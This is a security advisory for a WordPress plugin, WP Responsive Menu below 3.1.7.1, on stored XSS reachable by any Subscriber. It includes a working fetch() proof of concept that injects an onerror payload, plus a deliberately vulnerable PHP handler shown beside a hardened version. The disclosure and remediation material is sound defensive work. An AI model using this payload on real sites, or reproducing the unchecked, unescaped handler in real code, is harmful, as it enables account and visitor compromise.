wpexploit | Krzysztof Zając | WPEX-ID:661CB7E3-D7BD-4BC1-BF78-BDB4BA9610D7
History: Jan 26, 2022 - 12:00 a.m.

WP Responsive Menu < 3.1.7.1 - Subscriber+ Settings Update to Stored XSS


EPSS: 0.001 (Low), percentile 24.8%

The plugin does not perform capability or CSRF (nonce) checks in the wpr_live_update AJAX action, and it neither sanitises the submitted settings on input nor escapes them on output. As a result, any authenticated user, including a Subscriber, can overwrite the plugin's settings and inject a payload that is rendered on the frontend, giving a stored Cross-Site Scripting attack against every visitor and user of the site.

// Proof of concept: run from the browser console of a user logged in to the
// target site with Subscriber (or any other) privileges. fetch() sends the
// WordPress session cookie automatically for same-origin requests, and no
// nonce is required because the handler never checks one.
fetch("https://example.com/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    // wpr_live_update stores the submitted settings without a capability
    // check; the "position" value carries the payload that is later
    // written into the frontend markup unescaped.
    "body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\"><img src onerror=alert(/XSS/)>",
    "method": "POST",
})
.then(response => response.text())
.then(function(data) {
    console.log(data);

    // Follow-up request from the original PoC, sent once the settings
    // have been saved.
    fetch("https://example.com/wp-admin/admin-ajax.php", {
        "headers": {
            "content-type": "application/x-www-form-urlencoded",
        },
        "body": "action=wpr_get_transient_from_data",
        "method": "POST",
    });
});

The XSS will then be triggered on all frontend pages.
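The three missing controls named in the description (nonce check, capability check, sanitisation/escaping) are shown below as an added illustration in PHP. This is not the WP Responsive Menu plugin's code: the hook names, option name, capability and the whitelist of positions are assumptions chosen for the example. The first handler has the same defects as described above; the second is the hardened form a practitioner would expect in a WordPress admin-ajax action.

```php
<?php
/*
 * Added illustration, not code from the WP Responsive Menu plugin.
 * Shows an admin-ajax settings handler with the defects described in the
 * advisory beside a hardened version. All names (wpr_example_*,
 * 'wpr_example_options', the nonce action) are assumptions.
 */

// --- Vulnerable pattern (hypothetical) ---------------------------------------
// Any logged-in user can reach wp_ajax_* handlers, so without a capability
// check a Subscriber can overwrite the option, and without a nonce check a
// CSRF victim can be made to do so. The raw array is stored as-is and later
// echoed into frontend markup without escaping.
function wpr_example_live_update_vulnerable() {
    $options = isset( $_POST['wprmenu_options'] ) ? $_POST['wprmenu_options'] : array();
    update_option( 'wpr_example_options', $options );
    wp_send_json_success();
}
add_action( 'wp_ajax_wpr_example_live_update_vulnerable', 'wpr_example_live_update_vulnerable' );

function wpr_example_render_vulnerable() {
    $options = get_option( 'wpr_example_options', array() );
    // Stored XSS sink: a "><img src onerror=...> value breaks out of the attribute.
    echo '<div class="wpr-menu" data-position="' . $options['position'] . '"></div>';
}

// --- Hardened pattern ----------------------------------------------------------
function wpr_example_live_update_secure() {
    // 1. CSRF: require the nonce issued to the settings page. On failure
    //    check_ajax_referer() terminates the request.
    check_ajax_referer( 'wpr_example_live_update', 'nonce' );

    // 2. Authorisation: a nonce only proves the request came from a page
    //    the caller could load; the capability check is what excludes
    //    Subscribers from changing plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input validation: accept only known keys, coerced to the expected
    //    type, instead of persisting whatever array the client sent.
    $raw = ( isset( $_POST['wprmenu_options'] ) && is_array( $_POST['wprmenu_options'] ) )
        ? wp_unslash( $_POST['wprmenu_options'] )
        : array();

    $allowed_positions = array( 'left', 'right' ); // assumed whitelist
    $position = isset( $raw['position'] ) ? sanitize_text_field( $raw['position'] ) : 'left';
    if ( ! in_array( $position, $allowed_positions, true ) ) {
        $position = 'left';
    }

    $clean = array(
        'enabled'  => ! empty( $raw['enabled'] ) ? 1 : 0,
        'position' => $position,
    );

    update_option( 'wpr_example_options', $clean );
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_wpr_example_live_update_secure', 'wpr_example_live_update_secure' );

function wpr_example_render_secure() {
    $options = wp_parse_args( get_option( 'wpr_example_options', array() ), array( 'position' => 'left' ) );
    // 4. Output escaping at the sink, even though the value was validated on
    //    input: the option can also be written by other code paths.
    echo '<div class="wpr-menu" data-position="' . esc_attr( $options['position'] ) . '"></div>';
}

// The nonce the secure handler expects is handed to the settings page script
// (settings.js is assumed to read wprExample.nonce and post it as "nonce").
function wpr_example_enqueue_settings_script() {
    wp_enqueue_script( 'wpr-example-settings', plugins_url( 'settings.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'wpr-example-settings', 'wprExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'wpr_example_live_update' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'wpr_example_enqueue_settings_script' );
```

The nonce and the capability check are independent controls: a Subscriber who can load any page where the nonce is localized can still obtain a valid nonce, so only current_user_can() stops the privilege problem described in the advisory, while only the nonce stops a cross-site request from a higher-privileged victim's browser. Escaping at the output sink is kept even after input validation, because the same option may be written by other code paths.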

